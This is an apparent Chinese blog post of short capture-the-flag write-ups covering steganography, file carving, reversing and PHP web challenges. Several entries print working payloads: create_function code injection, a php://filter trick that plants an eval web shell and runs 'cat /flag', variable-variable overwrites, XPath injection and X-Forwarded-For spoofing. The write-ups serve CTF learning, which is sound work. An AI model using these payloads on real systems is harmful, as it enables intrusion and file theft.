youbing的博客

这里怀疑高度被修改过

修改高度得到密码

发现包含word文件

Binwalk分离得到word文档

没有信息可能被隐藏了设置选择隐藏文件后得到隐藏文字

用base64转文件得到压缩包里面有加密在word属性中找到密码

得到.exe文件用IDA分析找到key

根据逻辑写脚本得到flag

题目告诉我们flag在/flag里面这里只要读取/flag就行了

这里需要利用$shaw(‘’,$root);执行命令构造payload：?root=;}readfile(‘/flag’);/*

POST：shaw=create_function

得到flag

打开压缩包发现有一个加密的图片，暴力破解得到密码

这里查看发现没包含文件，查看属性都没得到有用信息，用Stegsolve.jar发现lsb有数据用cloacked-pixel分析密码用压缩包密码，分析得到flag

这道题”<?php exit();”会影响后续代码的执行这里用base64绕过

Payload：?filename=php://filter/convert.base64-decode/resource=shell.php

POST：content=aPD9waHAgZXZhbCgkX1BPU1RbMV0pOw==

再访问/shell.php，POST传1=system(‘cat /flag’);

得到flag

这里需要绕过恢复flag原始值，构造payload：?a=flag&flag=a先让a=flag绕过第一层检测

再flag=a绕过第二层检测

然后$$key=$a,$$value=$flag再$$key=$$value这里就$a=$flag了

接下来跟上述一样的操作让$flag=$a=$flag,最后输出$flag

输入payload在最底部找到flag

题目显示

像是XPath 注入回显特征，这里尝试XPath 注入
构造payload：’]|//|//[‘ 得到flag

这里flag估计是个变量直接让c=GLOBALS查看所有变量得到flag

这道题需要ip=1.1.1.1才能得到flag

用X-Forwarded-For:1.1.1.1伪造自己ip为1.1.1.1得到flag

这里查看发现包含一个flag.zip和第二段密码

Binwalk分离得到flag.zip

备注中得到第一段密码

输入密码解压文件用记事本打开WordDocument得到flag

根据题目构造脚本爆破得到密码

输入密码得到flag